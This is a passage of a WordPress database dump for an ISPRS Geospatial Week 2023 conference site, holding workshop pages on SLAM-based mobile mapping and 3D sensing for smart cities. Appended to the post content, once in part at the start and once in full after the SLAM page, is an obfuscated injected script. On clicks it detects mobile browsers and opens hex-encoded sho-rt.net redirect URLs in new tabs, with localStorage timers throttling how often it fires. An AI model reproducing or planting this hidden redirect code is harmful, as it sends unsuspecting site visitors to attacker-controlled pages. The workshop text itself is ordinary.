_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 20:05:37','2022-10-07 20:05:37','',2095,'https://gsw2023.com/?p=2569',0,'revision','',0),
(2570,1,'2022-10-07 20:08:42','2022-10-07 20:08:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence</span></strong></h5>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<h1 style=\"text-align: center;\">CHAIRS</h1>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Semantic and metric SLAM</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>New robotic mapping applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Robotic mapping benchmarks</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','publish','closed','closed','','robotics-for-mapping-slam-approaches-for-mobile-mapping-and-robot-intelligence','','','2023-02-05 11:04:29','2023-02-05 11:04:29','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2570',0,'dt_portfolio','',0),
(2571,1,'2022-10-07 20:08:42','2022-10-07 20:08:42','','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2022-10-07 20:08:42','2022-10-07 20:08:42','',2570,'https://gsw2023.com/?p=2571',0,'revision','',0),
(2572,1,'2022-10-07 20:10:01','2022-10-07 20:10:01','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2583\" img_size=\"322x196\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>3DS Smart Cities - 3D Sensing for Smart Cities</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>High-accuracy and high-efficiency 3D sensing and associated data processing techniques are urgently needed for smart cities. 3D geospatial data acquired by digital photogrammetry and LiDAR systems have become one of the most important data sources to support smart city applications, such as city infrastructure inventory, city planning, urban design, autonomous driving, etc. This workshop will seek contributions covering advanced topics related to the state of the art and future trends of 3D sensing technology and algorithms for smart city applications. Papers addressing the following topics are welcome: photogrammetric mapping, LiDAR point cloud processing, ubiquitous sensing, cross-modality sensing, etc. The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"38\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: brown;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Airborne photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Airborne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Mobile LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS-based photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS borne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning methods for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Low-cost multi-sensor systems for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system design and on-board processing</strong></h6>\n</li>\n<li>\n<h6><strong>Cross-modality sensing data integration</strong></h6>\n</li>\n<li>\n<h6><strong>Ubiquitous sensing with sensors in mobile devices</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of smart city applications</strong></h6>\n</li>\n<li class=\"m_-7709850013166616182MsoListParagraph\">\n<h6><b>Place recognition and localization for smart cities</b></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Andrea Lingua, Polytechnic University of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Jiaojiao Tian, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Rongjun Qin, Ohio State University, 